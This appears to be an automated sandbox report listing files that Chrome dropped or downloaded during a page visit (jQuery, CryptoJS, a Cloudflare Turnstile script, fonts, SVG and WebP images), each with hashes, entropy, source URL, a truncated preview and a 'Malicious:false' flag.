                                                                                                                                            Size (bytes):89501
                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):48316
                                                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (47671)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):47672
                                                                                                                                            Entropy (8bit):5.401921124762015
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUEn+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3UEsnpj
                                                                                                                                            MD5:B804BCD42117B1BBE45326212AF85105
                                                                                                                                            SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                                                                                                            SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                                                                                                            SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):48316
                                                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (47671)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):47672
                                                                                                                                            Entropy (8bit):5.401921124762015
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUEn+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3UEsnpj
                                                                                                                                            MD5:B804BCD42117B1BBE45326212AF85105
                                                                                                                                            SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                                                                                                            SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                                                                                                            SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.js
                                                                                                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (37673)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):364728
                                                                                                                                            Entropy (8bit):5.542315360727351
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:exjICRAU/CMDUUsnnZefYbh5eNGQTOvXyBmglrIcQ:aJAUpUhnnZWEh5esQCvXyTrXQ
                                                                                                                                            MD5:88EEB9382B45FB660C241ADD89B7EA81
                                                                                                                                            SHA1:F9D941CF826EFEE9191ADB90A75715439BCF6EB6
                                                                                                                                            SHA-256:F14CD52CCC7F1DF4DCA05AB33AC62DA2E60D26117944DEF08692B11D64102080
                                                                                                                                            SHA-512:2A6F5CED0B2C5292E180E4CE8E499983B399896D7D379AB9C9E413EF2707CE4461FEC4977E3C3B91122D2ECE43EC91B246284847CE11BCCF9EA61C7FA23A0BB0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:const oA="modulepreload",sA=function(e){return"/build/"+e},yg={},ee=function(t,n,i){if(!n||n.length===0)return t();const s=document.getElementsByTagName("link");return Promise.all(n.map(a=>{if(a=sA(a),a in yg)return;yg[a]=!0;const l=a.endsWith(".css"),c=l?'[rel="stylesheet"]':"";if(!!i)for(let g=s.length-1;g>=0;g--){const m=s[g];if(m.href===a&&(!l||m.rel==="stylesheet"))return}else if(document.querySelector(`link[href="${a}"]${c}`))return;const h=document.createElement("link");if(h.rel=l?"stylesheet":oA,l||(h.as="script",h.crossOrigin=""),h.href=a,document.head.appendChild(h),l)return new Promise((g,m)=>{h.addEventListener("load",g),h.addEventListener("error",()=>m(new Error(`Unable to preload CSS for ${a}`)))})})).then(()=>t()).catch(a=>{const l=new Event("vite:preloadError",{cancelable:!0});if(l.payload=a,window.dispatchEvent(l),!l.defaultPrevented)throw a})};var ln=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};function ru(
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):28584
                                                                                                                                            Entropy (8bit):7.992563951996154
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:768:8n53CNftp4NM/2qxGvtAG9fvpWYSTvlj6OIqrd1xUseRc:85SNfQS2ntfxvpWYSTcfMERc
                                                                                                                                            MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                                                                                            SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                                                                                            SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                                                                                            SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/GDSherpa-regular.woff2
                                                                                                                                            Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (18563)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):18631
                                                                                                                                            Entropy (8bit):5.209558465650827
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:YLExv60IOUhZVezJOQ/IIy/8x89TSU2GzXL:vxenezJun+OTSU2M
                                                                                                                                            MD5:05550215707FB77F6D07BCC793526E28
                                                                                                                                            SHA1:71BBCAFF7C546C92C67991AF6E35EB6363E04B84
                                                                                                                                            SHA-256:0562E5674602291CE06869880ED86B2B9D26AE26F17D25F9587C7AE26F62B6B2
                                                                                                                                            SHA-512:F65AD1C08C8CFD8ADE894C2B0681CFF47904D81D4D61717133321DE0B5FCA6C7539AA87720EA2E7415EA0DE1BA410ECAED4EB419BD60835B9F0CBA906B92D6A3
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://r.wdfl.co/rw.js
                                                                                                                                            Preview:/*! Build 4715bccd58d99595466a0b6640a356de2767b599:1730734838450 */.!function(e){var t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return r.d(t,"a",t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="https://cdn.getrewardful.com/pa
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):268
                                                                                                                                            Entropy (8bit):5.111190711619041
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                                                                                                            MD5:59759B80E24A89C8CD029B14700E646D
                                                                                                                                            SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                                                                            SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                                                                            SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2905
                                                                                                                                            Entropy (8bit):3.962263100945339
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                                                                                                            MD5:FE87496CC7A44412F7893A72099C120A
                                                                                                                                            SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                                                                            SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                                                                            SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/yzCIRquaPFUjERvoqJYr7I3cogJBrGklDFyrsAZD9QeqnvfO79zHfIab179
                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):17842
                                                                                                                                            Entropy (8bit):7.821645806304586
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EwTZQ74B48VtrMvbt0sAvPTMaf+j5s8OYbqarRbjy5Qg1AR/kf63z/:hTa4B4mtYztAvPTMFhOYb3Rbu571AJa6
                                                                                                                                            MD5:4B52ECDC33382C9DCA874F551990E704
                                                                                                                                            SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                                                                                            SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                                                                                            SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/uvvJrrwLawKtH7uvbTOLQFH5urwDkIf67DrJWCuu0sPsB6Cxztqv96T1CyIB9ef255
                                                                                                                                            Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):93276
                                                                                                                                            Entropy (8bit):7.997636438159837
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:1536:Dy7KSLv+MMqDeeIgDFSxpuQP7ObnKSWBO61LlRzSSAT6YmkSzOu7Be0OB53jIH4I:Dy7JD+net+puI7ObKHVhTSSlYmk4OuWa
                                                                                                                                            MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                                                                                            SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                                                                                            SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                                                                                            SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/GDSherpa-vf2.woff2
                                                                                                                                            Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3017)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3018
                                                                                                                                            Entropy (8bit):4.9328629827634165
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:GOlDyZFS46fEKx8iCL1yTJWlTn8iRD1TBDopvvDnt4HhVG:GOlDwFS46MBymD1GZ2G
                                                                                                                                            MD5:83727E50D2DABCE40620BF41E2545B67
                                                                                                                                            SHA1:F77D8BAF6B3781D87F8607B678BFB51D535E871B
                                                                                                                                            SHA-256:1780CD3C16090E58A07403AFE55C8C972C295F27ABB05C65B61B4CA88B7040CF
                                                                                                                                            SHA-512:8E1DCDB62923359082EA39CBF49EB47A80C9670509F6AE35FFB995692F5D2C22BFA6492F0278C69F0272F10FDC19AAF35DD1707ADC9A6CAED8A1D87D5D0EA5FA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:import{o as d,d as a,e as c,l,n as i}from"./app-49265ad1.js";const u=["type","disabled"],y={key:0,class:"i-eos-icons:bubble-loading block h-3 w-3"},h={__name:"Button",props:{color:{type:String,default:"primary"},size:{type:String,default:"md"},rounded:{type:String,default:"lg"},type:{type:String,default:"submit"},outlined:{type:Boolean,default:!1},loading:{type:Boolean,default:!1}},setup(o){const n={primary:"bg-gray-900 enabled:hover:bg-gray-800 enabled:active:bg-gray-700 enabled:focus:border-gray-800 enabled:focus:ring-gray-800",secondary:"bg-secondary-1000 hover:bg-secondary-900 active:bg-secondary-800 active:ring-secondary-800 ring-orange-500 focus:border-secondary-800 focus:ring-secondary-800",blue:"bg-blue-700 hover:bg-blue-600 active:bg-blue-700 focus:border-blue-800 focus:ring-blue-300",green:"bg-green-800 hover:bg-green-700 active:bg-green-900 focus:border-green-900 focus:ring-green-300",blueOrange:"bg-gradient-to-r from-blue-700 to-orange-700 hover:from-blue-600 hover:to-orang
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):644
                                                                                                                                            Entropy (8bit):4.6279651077789685
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:EEasTzWl6/Kjsg9GXlxDfwyf+/11C1+/MguB/KQGXlxD3EZAGxtw006cNOBkP1HJ:PaPlKKVkz1f+tPUgo/KQGbEZAuwz65GH
                                                                                                                                            MD5:541B83C2195088043337E4353B6FD60D
                                                                                                                                            SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                                                                                            SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                                                                                            SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/wxsGdcms1rtQz5l1cTKsINVaEcbHopXA7Zunk6vNV19QQVZ12130
                                                                                                                                            Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):89501
                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                            Malicious:false
